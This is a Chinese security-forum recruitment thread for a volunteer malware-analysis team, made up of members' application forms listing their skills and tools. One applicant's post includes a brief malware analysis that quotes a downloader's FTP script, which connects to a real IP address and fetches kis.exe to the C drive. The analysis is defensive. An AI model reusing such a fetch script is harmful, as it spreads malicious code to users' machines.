★★★ 缉毒卫队 ★★★ 成员招募专贴 【禁水&非申请勿回复】

1670338677

ID:1670338677
是否有分析病毒的热情：有
是否熟悉 进程 / 注册表 等知识：熟悉
对行为/逆向的了解程度：完全不了解
了解的安全辅助工具：虚拟机  / PC Hunter / 金山火眼 /PowerTool
建议：无
对自己的描述：想学习逆向等技术
经常活跃的版区：样本区 / 下载区
擅长/爱好：学过一点C
其它:无

代陌

ID：代陌
是否有分析病毒的热情：有
是否熟悉 进程 / 注册表 等知识：有一点了解
对行为/逆向的了解程度：了解行为分析 / 了解逆向
了解的安全辅助工具： 虚拟机  / PC Hunter / 金山火眼 等
建议：暂无
对自己的描述：正义~~哈哈哈
经常活跃的版区：看到喜欢的帖子就会点进去~~
擅长/爱好：没发现

翼风Fly

rsin 发表于 2016-2-2 22:44
看到了，太麻烦  算了

因您取消申请，故此次不予通过，感谢您的参与

Kyo.BA

ID:467100524
是否有分析病毒的热情：有
是否熟悉 进程 / 注册表 等知识： 有一点了解
对行为/逆向的了解程度：了解行为分析
了解的安全辅助工具： 虚拟机 /shadow defender /sandboxie
建议：建议设立缉毒卫队的群，能更好分析暂时无法处理的问题
对自己的描述：没事儿了，就开始折腾杀软，样本。
经常活跃的版区：国外区/卡巴区/样本区
擅长/爱好：Windwos/Mac/日语
其它:电脑技术方面不能够说是专长，毕竟一些涉及到系统底层的只是还是不太了解，但是希望加入缉毒卫队后能让自己的一些知识为卡饭贡献一份微薄之力。

AFHY

ID:AFHY
是否有分析病毒的热情：有
是否熟悉 进程 / 注册表 等知识：有一点了解
对行为/逆向的了解程度：完全不了解
了解的安全辅助工具：金山火眼
建议：互相帮助，互相学习
对自己的描述：兴趣浓厚的业余小白
经常活跃的版区：国外杀软软件 / 答疑区
擅长/爱好：爱折腾，强迫症的电脑爱好狂魔

翼风Fly

AFHY 发表于 2016-2-27 15:23
ID:AFHY
是否有分析病毒的热情：有
是否熟悉 进程 / 注册表 等知识：有一点了解

您好，希望您能尽快回复一下短消息，3月14日前若仍未回复将视为自动放弃喏~
----------------------------------------
更新：因长时间未进行有效回复，故不予通过。

C-FBI-QM

ID:C-FBI-QM
是否有分析病毒的热情：必须有
是否熟悉 进程 / 注册表 等知识：熟悉
对行为/逆向的了解程度：熟悉行为分析 / 了解逆向
了解的安全辅助工具：虚拟机  / PC Hunter / 金山火眼 等
对自己的描述：新人一枚
经常浏览的版区：样本区
擅长/爱好：作死
其他：要不要考虑另外一个扫描网站，virusbook，火眼和B超已经不维护了
附行为分析一枚,样本来自52一个求助帖:
http://www.52pojie.cn/thread-472685-1-1.html
一共三个文件
第一个qxxxx：
PEID查壳，UPX，看区段，UPX0 UPX1 RMNET RSRC
典型的ramnit感染性，放到virusbook扫了下
确定无疑，这个就不行为了。


第二个server：
详细信息写的居然是360安全卫士 安全防护中心模块
但是没有数字签名，一看就是假的吗

查壳，无壳VC6，但是入口对不上，不管咯，下面跑起来

连接一个IP，修改了注册表，来实现自启动
很明显的远控特征


第三个zykis:
PEID查壳，不是有效PE文件

用hexworkshop编辑一下，应该是个下载器

再用notepad++试试
open 175.102.32.77
123
123
get kis.exe c:\stkis.exe
bye
太明显了，但是这个exe我没有获取到
大体就酱，如有不对之处，请赐教

2483883670

ID:2483883670
是否有分析病毒的热情：有
是否熟悉 进程 / 注册表 等知识：熟悉
对行为/逆向的了解程度：了解行为分析
了解的安全辅助工具：powertool/PC Hunter/ 金山火眼
建议：互相帮助，和平共处
对自己的描述：会冷静思考问题
经常活跃的版区：样本区
擅长/爱好：本人热爱计算机病毒研究，擅长使用ARK工具手杀病毒
其它:无

xin053

ID:xin053
是否有分析病毒的热情：有
是否熟悉 进程 / 注册表 等知识：熟悉
对行为/逆向的了解程度： 熟悉逆向
了解的安全辅助工具：虚拟机  / PC Hunter / OD / IDA / wireshark
建议：好好学习，逆向分析
对自己的描述：学习逆向知识的小白,对网络安全略有研究
经常活跃的版区：样本区
擅长/爱好：wireshark网络分析,OD，IDA破解简单CM与逆向分析，win32汇编
其它: 了解大多数编程语言，目前正在学逆向的同时苦练python，并开始入门学习kali，无奈很多东西还只停留在理论上，动手太少，原谅我目前没有什么拿得出手的作品，希望加入团队共同进步，谢谢

windows7爱好者

版主啊，这是我第二次申请了，关于魅力的问题，你就饶了我吧
ID:windows7爱好者
是否有分析病毒的热情：十分有
是否熟悉 进程 / 注册表 等知识：熟悉
对行为/逆向的了解程度：熟悉行为分析，逆向就不会了
了解的安全辅助工具：PT,PC，火眼，哈勃，VT,VB,影子，虚拟机
建议：卡饭的气氛应该更积极活跃一些，不能因为害怕惹人就不敢正视问题，指明问题
对自己的描述：IT技术爱好者
经常活跃的版区：样本区 / 病毒救援区 / 答疑区 / 国外杀毒软件区/HIPS区/辅助工具区/windows系统区/国内杀毒软件区
擅长/爱好：IT技术
其它:希望这次可以通过